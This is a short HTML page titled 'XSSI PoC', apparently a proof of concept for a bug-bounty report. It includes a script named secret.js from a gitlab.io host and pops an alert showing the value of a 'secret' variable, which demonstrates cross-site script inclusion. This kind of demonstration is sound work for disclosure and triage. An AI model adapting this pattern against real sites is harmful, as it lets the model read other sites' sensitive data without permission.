<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <meta name="generator" content="GitLab Pages">
    <title>XSSI PoC</title>
    <script src="https://hackerone_triage.gitlab.io/secret.js"></script>
  </head>
  <body>
    <script>alert(secret)</script>
  </body>
</html>

